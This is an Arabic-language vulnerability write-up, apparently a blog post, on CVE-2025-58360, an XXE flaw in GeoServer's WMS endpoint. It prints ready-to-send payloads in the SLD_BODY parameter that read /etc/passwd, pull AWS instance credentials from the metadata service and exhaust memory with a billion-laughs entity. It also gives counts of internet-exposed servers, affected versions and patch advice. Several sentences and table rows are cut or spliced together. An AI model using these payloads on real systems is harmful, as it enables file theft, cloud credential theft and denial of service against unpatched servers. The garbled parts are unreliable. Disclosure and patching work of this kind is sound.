
CVE-2025-58360

AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:Lهذه XXE كلاسيكية لكنها مدمرة في نقطة نهاية GetMap الخاصة بخدمة خرائط الويب (WMS).
يمكن للمهاجمين:
/etc/passwd, geoserver.xml, مفاتيح خاصة، إلخ)→ هذا يعني عشرات الآلاف من الخوادم المعرضة للخطر الموجودة حاليًا على الإنترنت المفتوح! 🌐
نقطة النهاية: POST /geoserver/wms
المعامل الرئيسي: SLD_BODY (يسمح بتركيبات XML خام)
مسار الكود المعرض للثغرة: محلل XML لا يعطل تحليل الكيانات الخارجية → XXE كلاسيكية.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<sld:StyledLayerDescriptor xmlns:sld="http://www.opengis.net/sld" version="1.0.0">
<sld:UserLayer>
<sld:LayerFeatureConstraints>
<sld:FeatureTypeConstraint>&xxe;</sld:FeatureTypeConstraint>
</sld:LayerFeatureConstraints>
</sld:UserLayer>
</sld:StyledLayerDescriptor>
→ تحتوي الاستجابة على محتويات /etc/passwd 🎉
<!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/">
→ يسرب بيانات اعتماد AWS المؤقتة إذا كان الخادم يعمل على EC2.
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!-- repeat up to lol9 -->
]>
<lol>&lol9;</lol>
→ يستهلك غيغابايتات من الذاكرة العشوائية (RAM) في ثوانٍ 💥
| الإصدار | تاريخ الإصدار | رابط التنزيل |
|---|---|---|
| 2.27.0 | 25 نوفمبر 2025 | https://geoserver.org/release/stable/ |
مستخدمو Docker:
docker pull osgeo/geoserver:2.27.0
<!ENTITY أو SYSTEM "file://| التاريخ | الحدث |
|---|---|
| قبل نوفمبر 2025 | اكتُشفت تلقائيًا بواسطة ماسح XBOW الذكي |
| 25 نوفمبر 2025 | كشف منسق → تم إصدار التصحيحات |
| 25 نوفمبر 2025 | تم تعيين CVE ونشره |
| 26 نوفمبر 2025 | تنتشر الـ PoCs بشكل واسع، وتقفز عمليات فحص التعرض |
هذه XXE نموذجية تصيب منصة جغرافية مكانية منتشرة على نطاق واسع مع عشرات الآلاف من الحالات الموجهة للإنترنت.
صدرت التصحيحات في نفس يوم الكشف — تحية كبيرة لفريق GeoServer على السرعة! 🏆
لكن الفترة الزمنية بين توفر التصحيح والاستغلال الجماعي تتقلص بسرعة.
إذا كنت تشغّل GeoServer → قم بالترقية اليوم.
لا تكن عنوان الخبر التالي.
ابقَ آمنًا، ابقَ لامعًا! 🛡️✨
| المكوّن | الإصدارات المتأثرة | تم الإصلاح في | الحالة |
|---|
| GeoServer المستقل | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.3, 2.25.6, 2.27.0 | 🔴 متأثر |
| Docker (osgeo/geoserver) | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.27.0 | 🔴 متأثر |
| Maven org.geoserver:gs-wms | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 متأثر |
| Maven org.geoserver.web:gs-web-app | 2.26.0 – 2.26.1 ≤ 2.25.5 | 2.26.2+, 2.25.6 | 🔴 متأثر |
| GeoServer 2.27.x والإصدارات الأحدث | – | تم إصلاحه بالفعل | ✅ آمن |
| المصدر | الحالات المكشوفة | ملاحظات |
|---|
| ZoomEye | ~49,400 | البحث بـ app:"GeoServer" |
| FOFA | ~24,000 | نتائج العام الماضي |
| Shodan | ~31,000 | المنفذ 8080 + تطابق العنوان |
| GobySec | ~20,000 | فحص الشبكات العامة |
| 2.26.3 |
| 25 نوفمبر 2025 |
| تصحيح فرع الصيانة |
| 2.25.6 | 25 نوفمبر 2025 | فرع مدعوم أقدم |